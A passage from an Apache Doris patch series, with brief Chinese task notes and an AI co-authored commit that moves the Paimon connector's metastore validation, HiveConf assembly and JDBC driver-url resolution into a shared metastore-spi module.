`ctx.loadHiveConfResources(raw.get("hive.conf.resources"))` 当 base 先施、再叠 overrides,否则外部 hive-site.xml 静默丢。②**HMS doAs 消费契约**:FE doAs 决策须看 `kerberos()` 非 `getAuthType()`(HDFS-fallback 时 getAuthType=SIMPLE 但 kerberos().isPresent)。③driver 注册/DriverShim(JVM 副作用)留 P2-T03(仅 resolveDriverUrl 已上移)。 - **认领(2026-06-18,本 session)**:recon workflow `wf_187e052d-230`(4 reader + synth)+ 直接核实真实代码完成;3 边界经 AskUserQuestion 定(见下)。TDD:FILESYSTEM→REST→JDBC→DLF→HMS,单一 `[P2-T02]` commit。 - **用户 3 决策(2026-06-18 AskUserQuestion)**:①**kerberos = compile-dep only**(fe-kerberos 零新代码,现有 `AuthType`+`KerberosAuthSpec` facts 足够,doAs 留 FE 侧)→ **DV-006**;②**parser storage 入参 = 中立 `Map storageHadoopConfig`**(非 `List`,spi **不**依赖 fe-filesystem-api,保持 hadoop/fs-free)→ **DV-007**;③**全 5 后端一次 commit、增量构建**。 From 3c1e118dcfada7b2041e29a2e867bd6326f926a8 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 18:45:05 +0800 Subject: [PATCH 094/128] [P2-T03] fe-connector-paimon: cut metastore connection logic over to shared metastore-spi Replace the paimon connector's hand-rolled metastore connection logic with the shared fe-connector-metastore-spi built in P2-T02. The paimon SDK Options assembly and the filesystem/jdbc storage Configuration stay in the connector (they are not metastore-connection facts). - PaimonConnectorProvider.validateProperties: PaimonCatalogFactory.validate(props) -> MetaStoreProviders.bind(props, {}).validate(). This ADOPTS the spi's stricter, legacy-faithful rules (Q1): HMS forbidIf(simple)/requireIf(kerberos) on client principal+keytab, REST case-sensitive "dlf".equals(token.provider), and DLF requires OSS storage at CREATE CATALOG (was a build-time check). Unknown flavor now fails via bind() (no provider supports it) instead of a paimon-local message. - PaimonConnector.createCatalog: HMS/DLF branches bind the shared facts and assemble the HiveConf via the new thin PaimonCatalogFactory.assembleHiveConf(base, overrides) -- the connector seeds the external hive.conf.resources hive-site.xml as the BASE (F2), then overlays HmsMetaStoreProperties.toHiveConfOverrides() / DlfMetaStoreProperties.toDlfCatalogConf(). The build-time requireOssStorageForDlf call is removed (now enforced in validate()). - Driver-url resolution at both consumers (PaimonConnector FE registration + PaimonScanPlanProvider BE options) -> JdbcDriverSupport.resolveDriverUrl. The live JDBC driver registration (DriverManager.registerDriver + DriverShim + static caches) stays in PaimonConnector (Q2: single consumer, JVM side-effect, spi stays SDK-free). - Delete from PaimonCatalogFactory: validate / buildHmsHiveConf / buildDlfHiveConf / requireOssStorageForDlf / resolveDriverUrl / copyIfPresent / nullToEmpty / KNOWN_FLAVORS. Delete DLF_* / REST_TOKEN_PROVIDER / REST_DLF_* alias constants from PaimonConnectorProperties (the @ConnectorProperty aliases in the spi are now authoritative). HMS_URI/REST_URI/JDBC_*/flavor literals stay (buildCatalogOptions). - Tests: validate behavior moves to PaimonConnectorValidatePropertiesTest (13, incl the 3 tightenings, RED->GREEN); buildHmsHiveConf/buildDlfHiveConf/requireOssStorage content tests removed (parity now owned by the spi's Hms/DlfMetaStorePropertiesTest); add 2 assembleHiveConf tests pinning the F2 base-then-overrides layering. Verification: full paimon module 278 pass / 0 fail / 1 skip (live, gated), checkstyle 0, tools/check-connector-imports.sh exit 0. Recon (wf_9437dd4e-06d) verified byte-parity of all load-bearing paths; adversarial review (wf_dd78ec4b-da5) READY, 0 real findings. docker e2e NOT run (HMS/DLF live metastore=hive + plugin-zip ServiceLoader discovery of the 5 providers under the child-first loader gated to P2-T05). Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 10 + .../paimon/PaimonCatalogFactory.java | 377 ++----------- .../connector/paimon/PaimonConnector.java | 28 +- .../paimon/PaimonConnectorProperties.java | 21 +- .../paimon/PaimonConnectorProvider.java | 17 +- .../paimon/PaimonScanPlanProvider.java | 3 +- .../paimon/PaimonCatalogFactoryTest.java | 502 +----------------- ...PaimonConnectorValidatePropertiesTest.java | 207 ++++++++ 8 files changed, 318 insertions(+), 847 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorValidatePropertiesTest.java diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index afd35ff4d7dd56..78e53f3a551564 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -64,6 +64,16 @@ under the License. ${project.version} + + + ${project.groupId} + fe-connector-metastore-spi + ${project.version} + + ${project.groupId} diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index 2c7e6d43202120..9bd8cdbb41dd3a 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -17,7 +17,6 @@ package org.apache.doris.connector.paimon; -import org.apache.commons.lang3.BooleanUtils; import org.apache.commons.lang3.StringUtils; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.hive.conf.HiveConf; @@ -26,35 +25,33 @@ import org.apache.paimon.options.CatalogOptions; import org.apache.paimon.options.Options; -import java.util.Arrays; -import java.util.HashSet; import java.util.Locale; import java.util.Map; -import java.util.Set; import java.util.function.BiConsumer; /** - * Pure, testable assembly core for the Paimon connector flavor switch. + * Pure, testable assembly core for the Paimon connector flavor switch — the paimon-SDK-specific bits + * that stay in the connector after the P2-T03 cutover. * *

    Mirrors the role of {@code MCConnectorClientFactory}: a stateless static holder that - * (a) fail-fast {@link #validate(Map) validates} catalog properties at CREATE CATALOG time, - * and (b) {@link #buildCatalogOptions(Map) builds} the Paimon {@link Options} for a flavor. + * {@link #buildCatalogOptions(Map) builds} the Paimon {@link Options} for a flavor. The option-key + * logic ports the legacy fe-core {@code AbstractPaimonProperties} + each {@code Paimon*MetaStoreProperties} + * Options assembly. {@code buildCatalogOptions} is PURE — it reads only the supplied props (no env, no + * clock) — which is what makes it unit-testable offline. * - *

    The option-key logic ports the legacy fe-core {@code AbstractPaimonProperties} + - * each {@code Paimon*MetaStoreProperties}. {@code buildCatalogOptions} is PURE — it reads only - * the supplied props (no env, no clock) — which is what makes it unit-testable offline. - * - *

    B1 also adds three PURE Hadoop config builders ({@link #buildHadoopConfiguration}, - * {@link #buildHmsHiveConf}, {@link #buildDlfHiveConf}) that reconstruct, from the raw property - * map plus a pre-computed canonical object-store storage config, the {@code Configuration}/ - * {@code HiveConf} that the live HiveCatalog needs. These replace the fe-core - * {@code StorageProperties.getHadoopStorageConfig()} / {@code HMSBaseProperties.getHiveConf()} / - * {@code PaimonAliyunDLFMetaStoreProperties.buildHiveConf()} with a minimal, fe-core-free - * reconstruction. The {@code storageHadoopConfig} arg is assembled by {@code PaimonConnector} from - * {@code ConnectorContext.getStorageProperties()} (fe-filesystem's - * {@code toHadoopProperties().toHadoopConfigurationMap()}), so the builders stay pure (Maps in, conf - * out) and unit-testable offline; only the {@code CatalogFactory.createCatalog} call in + *

    It also holds two PURE Hadoop config helpers: {@link #buildHadoopConfiguration} (the filesystem/jdbc + * storage {@code Configuration} from the pre-computed canonical object-store config) and + * {@link #assembleHiveConf} (layers the shared-parser HiveConf overrides over an optional hive-site.xml + * base for the hms/dlf flavors). The {@code storageHadoopConfig} arg is assembled by + * {@code PaimonConnector} from {@code ConnectorContext.getStorageProperties()} (fe-filesystem's + * {@code toHadoopProperties().toHadoopConfigurationMap()}), so the helpers stay pure (Maps in, conf out) + * and unit-testable offline; only the {@code CatalogFactory.createCatalog} call in * {@code PaimonConnector} needs a live metastore. + * + *

    The metastore CONNECTION facts (validate rules, HMS/DLF HiveConf key sets, JDBC driver-url + * resolution, alias arrays) were moved to the shared {@code fe-connector-metastore-spi} + * ({@code MetaStoreProviders.bind} -> {@code HmsMetaStoreProperties.toHiveConfOverrides()} / + * {@code DlfMetaStoreProperties.toDlfCatalogConf()}; {@code JdbcDriverSupport.resolveDriverUrl}) — see P2-T03. */ public final class PaimonCatalogFactory { @@ -62,13 +59,6 @@ public final class PaimonCatalogFactory { private static final String PAIMON_REST_PROPERTY_PREFIX = "paimon.rest."; private static final String JDBC_PREFIX = "jdbc."; - private static final Set KNOWN_FLAVORS = new HashSet<>(Arrays.asList( - PaimonConnectorProperties.FILESYSTEM, - PaimonConnectorProperties.HMS, - PaimonConnectorProperties.REST, - PaimonConnectorProperties.JDBC, - PaimonConnectorProperties.DLF)); - /** * Storage-config prefixes that are intentionally excluded from the catalog Options * passthrough — they belong in the Hadoop Configuration (see {@link #buildHadoopConfiguration}), @@ -105,110 +95,6 @@ public static String firstNonBlank(Map props, String... keys) { return null; } - /** - * Resolves a JDBC {@code driver_url} to a full, scheme-bearing URL string. A value already - * carrying a scheme ({@code "://"}) is used as-is; an absolute path (starting with {@code "/"}) - * is returned unchanged; otherwise it is treated as a bare jar file name and resolved against - * the engine's configured {@code jdbc_drivers_dir} (defaulting to - * {@code $DORIS_HOME/plugins/jdbc_drivers}), mirroring the minimal {@code JdbcResource.getFullDriverUrl} - * resolution (no file-existence / legacy old-dir / cloud-download handling). - * - *

    Shared by {@code PaimonConnector} (FE {@code URLClassLoader} driver registration) and - * {@code PaimonScanPlanProvider.getBackendPaimonOptions} (the BE-bound options, where BE does - * {@code new URL(value)} and a bare {@code "mysql.jar"} would throw {@code MalformedURLException}) - * so BOTH sides resolve a given {@code driver_url} identically. Security validation - * (format / {@code jdbc_driver_url_white_list} / {@code jdbc_driver_secure_path}) is enforced - * separately at CREATE CATALOG via {@code PaimonConnector.preCreateValidation}. - * - * @param driverUrl the raw driver_url; must be non-null and non-blank (the caller's responsibility — - * both call sites guard with {@code firstNonBlank}/non-null checks before calling) - * @param env the engine environment map (e.g. {@code jdbc_drivers_dir}, {@code doris_home}); never null - */ - public static String resolveDriverUrl(String driverUrl, Map env) { - if (driverUrl.contains("://")) { - return driverUrl; - } - if (driverUrl.startsWith("/")) { - // Absolute path, no scheme: legacy returns it as-is (no driversDir prepend). - return driverUrl; - } - String driversDir = env.get("jdbc_drivers_dir"); - if (StringUtils.isBlank(driversDir)) { - String dorisHome = env.getOrDefault("doris_home", "."); - driversDir = dorisHome + "/plugins/jdbc_drivers"; - } - return "file://" + driversDir + "/" + driverUrl; - } - - /** - * Fail-fast validation, mirroring the legacy per-flavor rules. Throws - * {@link IllegalArgumentException} (style consistent with MaxCompute), which the caller - * ({@code PluginDrivenExternalCatalog.checkProperties}) wraps into a DdlException. - */ - public static void validate(Map props) { - String flavor = resolveFlavor(props); - if (!KNOWN_FLAVORS.contains(flavor)) { - throw new IllegalArgumentException("Unknown paimon.catalog.type value: " + flavor); - } - - // warehouse required for ALL flavors, REST included (legacy parity): the base - // AbstractPaimonProperties declares @ConnectorProperty(names={"warehouse"}) and - // ConnectorProperty.required() defaults to true; PaimonRestMetaStoreProperties does NOT - // override it, so legacy rejects a REST catalog without warehouse. - if (StringUtils.isBlank(props.get(PaimonConnectorProperties.WAREHOUSE))) { - throw new IllegalArgumentException("Property warehouse is required."); - } - - switch (flavor) { - case PaimonConnectorProperties.HMS: - if (firstNonBlank(props, PaimonConnectorProperties.HMS_URI) == null) { - throw new IllegalArgumentException("hive.metastore.uris or uri is required"); - } - break; - case PaimonConnectorProperties.REST: - if (firstNonBlank(props, PaimonConnectorProperties.REST_URI) == null) { - throw new IllegalArgumentException("paimon.rest.uri or uri is required"); - } - if ("dlf".equalsIgnoreCase(props.get(PaimonConnectorProperties.REST_TOKEN_PROVIDER)) - && (StringUtils.isBlank(props.get(PaimonConnectorProperties.REST_DLF_ACCESS_KEY_ID)) - || StringUtils.isBlank(props.get(PaimonConnectorProperties.REST_DLF_ACCESS_KEY_SECRET)))) { - throw new IllegalArgumentException( - "DLF token provider requires 'paimon.rest.dlf.access-key-id' " - + "and 'paimon.rest.dlf.access-key-secret'"); - } - break; - case PaimonConnectorProperties.JDBC: - if (firstNonBlank(props, PaimonConnectorProperties.JDBC_URI) == null) { - throw new IllegalArgumentException("uri or paimon.jdbc.uri is required"); - } - if (firstNonBlank(props, PaimonConnectorProperties.JDBC_DRIVER_URL) != null - && firstNonBlank(props, PaimonConnectorProperties.JDBC_DRIVER_CLASS) == null) { - throw new IllegalArgumentException( - "jdbc.driver_class or paimon.jdbc.driver_class is required when " - + "jdbc.driver_url or paimon.jdbc.driver_url is specified"); - } - break; - case PaimonConnectorProperties.DLF: - if (firstNonBlank(props, PaimonConnectorProperties.DLF_ACCESS_KEY) == null) { - throw new IllegalArgumentException("dlf.access_key is required"); - } - if (firstNonBlank(props, PaimonConnectorProperties.DLF_SECRET_KEY) == null) { - throw new IllegalArgumentException("dlf.secret_key is required"); - } - // Legacy derives the endpoint from the region when endpoint is blank; if both are - // blank it throws. We do not derive here (the derivation happens in buildDlfHiveConf, - // where the endpoint is consumed), but we keep the same fail-fast contract. - if (firstNonBlank(props, PaimonConnectorProperties.DLF_ENDPOINT) == null - && StringUtils.isBlank(props.get(PaimonConnectorProperties.DLF_REGION))) { - throw new IllegalArgumentException("dlf.endpoint is required."); - } - break; - default: - // filesystem: warehouse-only, already checked above. - break; - } - } - /** * Builds the Paimon catalog {@link Options} for the resolved flavor. PURE: depends only on * {@code props}. Ports {@code AbstractPaimonProperties.appendCatalogOptions()} (common) plus @@ -412,220 +298,33 @@ private static void applyStorageConfig(Map storageHadoopConfig, } /** - * Builds the {@link HiveConf} for the {@code hms} flavor, reconstructed from the raw property - * map. Replaces fe-core {@code HMSBaseProperties.getHiveConf()} minimally: seeds the resolved - * external hive-site.xml as the BASE, sets all {@code hive.*} keys verbatim, the metastore uri, - * the present auth keys, the kerberos-conditional metastore SASL/service-principal/auth_to_local - * keys, the metastore client socket timeout default, then overlays the storage config. + * Assembles a {@link HiveConf} for the {@code hms}/{@code dlf} flavors from a neutral key map. + * Seeds the optional {@code base} (e.g. an external {@code hive.conf.resources} hive-site.xml, + * resolved FE-side via {@code ConnectorContext.loadHiveConfResources}) FIRST, then applies the + * shared-parser {@code overrides} on top (last-write-wins), so the connection/user keys correctly + * OVERRIDE the file — matching the legacy {@code HMSBaseProperties.checkAndInit} precedence (file + * base, then overrides). * - *

    {@code hiveConfResources} = the pre-resolved key/values of an external - * {@code hive.conf.resources} hive-site.xml, loaded FE-side via - * {@code ConnectorContext.loadHiveConfResources} (legacy {@code CatalogConfigFileUtils}, which the - * connector cannot import). It is the {@code HiveConf} BASE, applied BEFORE the user {@code hive.*} - * overrides — matching legacy {@code HMSBaseProperties.checkAndInit} precedence (file is base, user - * {@code hive.*} and the resolved uri win). + *

    The {@code overrides} are produced by the shared metastore parsers + * ({@code HmsMetaStoreProperties.toHiveConfOverrides()} — uri + verbatim {@code hive.*} + auth keys + * + socket-timeout default + storage overlay + kerberos block last; or + * {@code DlfMetaStoreProperties.toDlfCatalogConf()} — the 8 {@code dlf.catalog.*} keys + OSS storage + * overlay), which own the ordering-sensitive logic (storage overlay BEFORE the kerberos block). This + * method only layers the file base under those facts. The real Kerberos UGI {@code doAs} is injected + * by the FE via {@code ConnectorContext.executeAuthenticated}; the keys here only describe it. * - *

    {@code storageHadoopConfig} = the pre-computed canonical object-store config (from - * {@code ConnectorContext.getStorageProperties()} via fe-filesystem's - * {@code toHadoopConfigurationMap()}; P1-T03), overlaid via {@link #applyStorageConfig}. + *

    PURE: a function of the two maps (plus {@link HiveConf}'s own classpath defaults). * - *

    NOTE (B1, post-fix I-2): the kerberos-conditional metastore keys legacy - * {@code HMSBaseProperties.initHadoopAuthenticator}/{@code checkAndInit} sets ARE now handled - * here — {@code hive.metastore.sasl.enabled=true} + {@code hadoop.security.authentication=kerberos} - * (when the auth type is kerberos), the metastore SERVICE principal - * {@code hive.metastore.kerberos.principal} (sourced from {@code hive.metastore.service.principal} - * or {@code hive.metastore.kerberos.principal}), and {@code hadoop.security.auth_to_local}. - * The real Kerberos UGI {@code doAs} is injected by the FE via - * {@code ConnectorContext.executeAuthenticated}; here we only carry the auth keys into the conf - * (legacy additionally built a {@code HadoopAuthenticator} from them). - * - *

    PURE: depends only on the three maps. + * @param base optional base keys (e.g. a resolved hive-site.xml); may be {@code null}/empty + * @param overrides the connection-fact overrides; never {@code null} */ - public static HiveConf buildHmsHiveConf(Map props, Map hiveConfResources, - Map storageHadoopConfig) { + public static HiveConf assembleHiveConf(Map base, Map overrides) { HiveConf hiveConf = new HiveConf(); - // External hive-site.xml (hive.conf.resources) as the BASE (legacy checkAndInit loads the - // file first); the user hive.* keys below then correctly OVERRIDE it. - if (hiveConfResources != null) { - hiveConfResources.forEach(hiveConf::set); - } - // All user-supplied hive.* keys verbatim (legacy initUserHiveConfig). - props.forEach((k, v) -> { - if (k.startsWith("hive.")) { - hiveConf.set(k, v); - } - }); - // Metastore uri (legacy checkAndInit: hiveConf.set("hive.metastore.uris", uri)). - String uri = firstNonBlank(props, PaimonConnectorProperties.HMS_URI); - if (StringUtils.isNotBlank(uri)) { - hiveConf.set("hive.metastore.uris", uri); - } - // Auth keys present in props (legacy HMSBaseProperties @ConnectorProperty fields). The real - // UGI.doAs() is applied by ConnectorContext.executeAuthenticated; these keys just describe it. - copyIfPresent(props, hiveConf, "hive.metastore.authentication.type"); - copyIfPresent(props, hiveConf, "hive.metastore.client.principal"); - copyIfPresent(props, hiveConf, "hive.metastore.client.keytab"); - copyIfPresent(props, hiveConf, "hadoop.security.authentication"); - copyIfPresent(props, hiveConf, "hadoop.kerberos.principal"); - copyIfPresent(props, hiveConf, "hadoop.kerberos.keytab"); - - // Metastore client socket timeout default (legacy checkAndInit lines 204-208): when the user - // did not override it, default to Config.hive_metastore_client_timeout_second (=10s). The - // ConfVar key string is "hive.metastore.client.socket.timeout"; legacy expresses the value in - // seconds via HiveConf.setVar(..., METASTORE_CLIENT_SOCKET_TIMEOUT, "10"). - if (StringUtils.isBlank(props.get("hive.metastore.client.socket.timeout"))) { - hiveConf.set("hive.metastore.client.socket.timeout", "10"); - } - - // Overlay the storage config (legacy buildHiveConfiguration + appendUserHadoopConfig). - applyStorageConfig(storageHadoopConfig, props, hiveConf::set); - - // Kerberos-conditional metastore keys, ported faithfully from HMSBaseProperties.initHadoopAuthenticator - // (lines 152-185). This block runs LAST, AFTER the storage overlay, mirroring legacy's - // initHadoopAuthenticator-last ordering: the raw hadoop.* passthrough in applyStorageConfig would - // otherwise re-copy a user-supplied literal hadoop.security.authentication (e.g. a kerberized-HMS + - // simple-HDFS catalog) and CLOBBER the forced "kerberos" back to "simple", leaving sasl.enabled=true - // with auth=simple — an inconsistent HiveConf that breaks the live GSSAPI handshake. - // - the SERVICE principal hive.metastore.kerberos.principal is set UNCONDITIONALLY when a - // service principal is supplied (legacy field hiveMetastoreServicePrincipal, sourced from - // "hive.metastore.service.principal" OR "hive.metastore.kerberos.principal"); not gated on - // the auth type (legacy lines 153-155). - String servicePrincipal = firstNonBlank(props, - "hive.metastore.service.principal", "hive.metastore.kerberos.principal"); - if (StringUtils.isNotBlank(servicePrincipal)) { - hiveConf.set("hive.metastore.kerberos.principal", servicePrincipal); - } - // - hadoop.security.auth_to_local is set UNCONDITIONALLY when present (legacy lines 156-159). - copyIfPresent(props, hiveConf, "hadoop.security.auth_to_local"); - // - sasl.enabled + hadoop.security.authentication=kerberos are set when the HMS auth type is - // kerberos (legacy lines 160-167), OR — when the HMS auth type is NOT simple — when the - // HDFS auth type (hadoop.security.authentication) is kerberos (legacy fallback lines - // 174-182). Matches legacy's branching exactly. - String hmsAuthType = props.getOrDefault("hive.metastore.authentication.type", "none"); - String hdfsAuthType = props.get("hadoop.security.authentication"); - boolean hmsKerberos = "kerberos".equalsIgnoreCase(hmsAuthType); - boolean hdfsFallbackKerberos = !"simple".equalsIgnoreCase(hmsAuthType) - && !hmsKerberos - && "kerberos".equalsIgnoreCase(hdfsAuthType); - if (hmsKerberos || hdfsFallbackKerberos) { - hiveConf.set("hadoop.security.authentication", "kerberos"); - hiveConf.set("hive.metastore.sasl.enabled", "true"); - } - - // Username (legacy HMSBaseProperties @ConnectorProperty(names={"hive.metastore.username", - // "hadoop.username"}) -> hiveConf.set(HADOOP_USER_NAME="hadoop.username", hmsUserName)): resolve the - // alias to hadoop.username, also after the storage overlay so the legacy @ConnectorProperty priority - // is authoritative (same raw hadoop.* passthrough clobber reason as the kerberos block). The bare - // pre-fix copyIfPresent also missed a user who set ONLY hive.metastore.username (it stayed an inert - // verbatim hive.* key). - String hmsUserName = firstNonBlank(props, "hive.metastore.username", "hadoop.username"); - if (StringUtils.isNotBlank(hmsUserName)) { - hiveConf.set("hadoop.username", hmsUserName); - } - return hiveConf; - } - - /** - * Builds the {@link HiveConf} for the {@code dlf} flavor (Aliyun DLF adapted onto paimon's - * "hive" metastore via the ProxyMetaStoreClient). Replaces fe-core - * {@code PaimonAliyunDLFMetaStoreProperties.buildHiveConf()} + {@code AliyunDLFBaseProperties - * .checkAndInit()} minimally. - * - *

    reference: com.aliyun.datalake.metastore.common.DataLakeConfig.CATALOG_* (values verified - * via javap) — the 8 keys set below are the literal values of those constants: - *

    -     *   CATALOG_ACCESS_KEY_ID     = "dlf.catalog.accessKeyId"
    -     *   CATALOG_ACCESS_KEY_SECRET = "dlf.catalog.accessKeySecret"
    -     *   CATALOG_ENDPOINT          = "dlf.catalog.endpoint"
    -     *   CATALOG_REGION_ID         = "dlf.catalog.region"
    -     *   CATALOG_SECURITY_TOKEN    = "dlf.catalog.securityToken"
    -     *   CATALOG_USER_ID           = "dlf.catalog.uid"
    -     *   CATALOG_ID                = "dlf.catalog.id"
    -     *   CATALOG_PROXY_MODE        = "dlf.catalog.proxyMode"
    -     * 
    - * - *

    PURE: depends only on {@code props} and {@code storageHadoopConfig} (the pre-computed - * canonical OSS config from {@code ConnectorContext.getStorageProperties()}; P1-T03). - */ - public static HiveConf buildDlfHiveConf(Map props, - Map storageHadoopConfig) { - String accessKey = firstNonBlank(props, PaimonConnectorProperties.DLF_ACCESS_KEY); - String secretKey = firstNonBlank(props, PaimonConnectorProperties.DLF_SECRET_KEY); - String sessionToken = firstNonBlank(props, PaimonConnectorProperties.DLF_SESSION_TOKEN); - String region = props.get(PaimonConnectorProperties.DLF_REGION); - String endpoint = firstNonBlank(props, PaimonConnectorProperties.DLF_ENDPOINT); - String uid = firstNonBlank(props, PaimonConnectorProperties.DLF_UID); - String catalogId = firstNonBlank(props, PaimonConnectorProperties.DLF_CATALOG_ID); - String accessPublic = props.getOrDefault( - PaimonConnectorProperties.DLF_ACCESS_PUBLIC[0], - props.getOrDefault(PaimonConnectorProperties.DLF_ACCESS_PUBLIC[1], - PaimonConnectorProperties.DLF_ACCESS_PUBLIC_DEFAULT)); - String proxyMode = props.getOrDefault( - PaimonConnectorProperties.DLF_PROXY_MODE[0], - props.getOrDefault(PaimonConnectorProperties.DLF_PROXY_MODE[1], - PaimonConnectorProperties.DLF_PROXY_MODE_DEFAULT)); - - // Endpoint/catalog-id normalization (legacy AliyunDLFBaseProperties.checkAndInit). - if (StringUtils.isBlank(endpoint) && StringUtils.isNotBlank(region)) { - endpoint = BooleanUtils.toBoolean(accessPublic) - ? "dlf." + region + ".aliyuncs.com" - : "dlf-vpc." + region + ".aliyuncs.com"; - } - if (StringUtils.isBlank(endpoint)) { - throw new IllegalStateException("dlf.endpoint is required."); + if (base != null) { + base.forEach(hiveConf::set); } - if (StringUtils.isBlank(catalogId)) { - catalogId = uid; - } - - HiveConf hiveConf = new HiveConf(); - hiveConf.set("dlf.catalog.accessKeyId", nullToEmpty(accessKey)); - hiveConf.set("dlf.catalog.accessKeySecret", nullToEmpty(secretKey)); - hiveConf.set("dlf.catalog.endpoint", endpoint); - hiveConf.set("dlf.catalog.region", nullToEmpty(region)); - hiveConf.set("dlf.catalog.securityToken", nullToEmpty(sessionToken)); - hiveConf.set("dlf.catalog.uid", nullToEmpty(uid)); - hiveConf.set("dlf.catalog.id", nullToEmpty(catalogId)); - hiveConf.set("dlf.catalog.proxyMode", proxyMode); - // Overlay the OSS storage config (legacy ossProps.getHadoopStorageConfig + appendUserHadoopConfig). - // The OSS endpoint-from-region derivation now lives in the shared fe-property OSSProperties (used by the - // filesystem/hms flavors too, with the same dlf.access.public source), so no DLF-local OSS derivation is - // needed here. - applyStorageConfig(storageHadoopConfig, props, hiveConf::set); + overrides.forEach(hiveConf::set); return hiveConf; } - /** - * Fails fast unless an OSS / OSS_HDFS object-store storage key is present, mirroring legacy - * {@code PaimonAliyunDLFMetaStoreProperties.initializeCatalog}, which selected a - * {@code StorageProperties} of {@code Type.OSS || Type.OSS_HDFS} (NOT a generic S3 backend) and - * otherwise threw {@code "Paimon DLF metastore requires OSS storage properties."}. We cannot - * import the fe-core {@code StorageProperties} enum, so we key off the OSS-only storage property - * prefixes the user passes for a DLF catalog ({@code oss.} / {@code fs.oss.} / {@code paimon.fs.oss.}). - * A misconfigured S3-only DLF catalog (only {@code s3.*}/{@code fs.s3a.*}/{@code paimon.s3.*} keys) - * is therefore rejected, matching legacy. - * - *

    PURE: depends only on {@code props}. Throws {@link IllegalStateException} with the exact - * legacy message. - */ - public static void requireOssStorageForDlf(Map props) { - for (String key : props.keySet()) { - if (key.startsWith("oss.") || key.startsWith("fs.oss.") || key.startsWith("paimon.fs.oss.")) { - return; - } - } - throw new IllegalStateException("Paimon DLF metastore requires OSS storage properties."); - } - - private static void copyIfPresent(Map props, HiveConf hiveConf, String key) { - String value = props.get(key); - if (StringUtils.isNotBlank(value)) { - hiveConf.set(key, value); - } - } - - private static String nullToEmpty(String s) { - return s == null ? "" : s; - } - } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 1d7c1f438a43b8..48763bde2ae59a 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -23,6 +23,10 @@ import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.ConnectorValidationContext; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; +import org.apache.doris.connector.metastore.DlfMetaStoreProperties; +import org.apache.doris.connector.metastore.HmsMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.JdbcDriverSupport; +import org.apache.doris.connector.metastore.spi.MetaStoreProviders; import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.filesystem.properties.StorageProperties; @@ -169,16 +173,22 @@ private Catalog createCatalog() { // file reach the live metastore client (legacy HMSBaseProperties parity). Map hiveConfFiles = context.loadHiveConfResources( PaimonCatalogFactory.firstNonBlank(properties, "hive.conf.resources")); - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(properties, hiveConfFiles, storageHadoopConfig); + // Shared parser produces the neutral HiveConf overrides (P2-T03); the connector seeds the + // external hive-site.xml as the BASE first, then overlays the overrides (F2 ordering). + HmsMetaStoreProperties hms = (HmsMetaStoreProperties) + MetaStoreProviders.bind(properties, storageHadoopConfig); + HiveConf hc = PaimonCatalogFactory.assembleHiveConf(hiveConfFiles, hms.toHiveConfOverrides()); return createCatalogFromContext(CatalogContext.create(options, hc), flavor, "Failed to create Paimon catalog with HMS metastore"); } case PaimonConnectorProperties.DLF: { // Legacy parity: DLF metastore requires an OSS / OSS_HDFS backend specifically (not a - // generic S3 one). Enforced at catalog build, before the HiveConf is assembled, - // matching legacy PaimonAliyunDLFMetaStoreProperties.initializeCatalog timing. - PaimonCatalogFactory.requireOssStorageForDlf(properties); - // DLF storage is OSS (fe-filesystem-bound, in storageHadoopConfig); overlaid below. + // generic S3 one). This is now enforced at CREATE CATALOG by DlfMetaStoreProperties + // .validate() (via PaimonConnectorProvider.validateProperties), so a misconfigured + // S3-only DLF catalog never reaches this build path (P2-T03; replaces the old build-time + // requireOssStorageForDlf call). + // DLF storage is OSS (fe-filesystem-bound, in storageHadoopConfig); overlaid by the + // shared parser inside toDlfCatalogConf. // NOTE (B1/cutover-blocker P5-B7): same metastore=hive runtime gap as the hms branch // above — the Thrift metastore client (IMetaStoreClient/HiveMetaStoreClient, here the // Aliyun ProxyMetaStoreClient) is host-provided via hive-catalog-shade at cutover, not @@ -187,7 +197,9 @@ private Catalog createCatalog() { // metastore=hive paimon catalog created through the plugin throws neither // NoClassDefFoundError (.../IMetaStoreClient) nor a Configuration/HiveConf // LinkageError/ClassCastException. - HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(properties, storageHadoopConfig); + DlfMetaStoreProperties dlf = (DlfMetaStoreProperties) + MetaStoreProviders.bind(properties, storageHadoopConfig); + HiveConf hc = PaimonCatalogFactory.assembleHiveConf(null, dlf.toDlfCatalogConf()); return createCatalogFromContext(CatalogContext.create(options, hc), flavor, "Failed to create Paimon catalog with DLF metastore"); } @@ -279,7 +291,7 @@ private void maybeRegisterJdbcDriver() { /** * Resolves a driver_url to a full, scheme-bearing URL string for FE driver registration, - * delegating to the shared {@link PaimonCatalogFactory#resolveDriverUrl} so the FE registration + * delegating to the shared {@link JdbcDriverSupport#resolveDriverUrl} so the FE registration * path and the BE-bound scan options ({@code PaimonScanPlanProvider.getBackendPaimonOptions}) * resolve a given driver_url identically. * @@ -293,7 +305,7 @@ private void maybeRegisterJdbcDriver() { */ 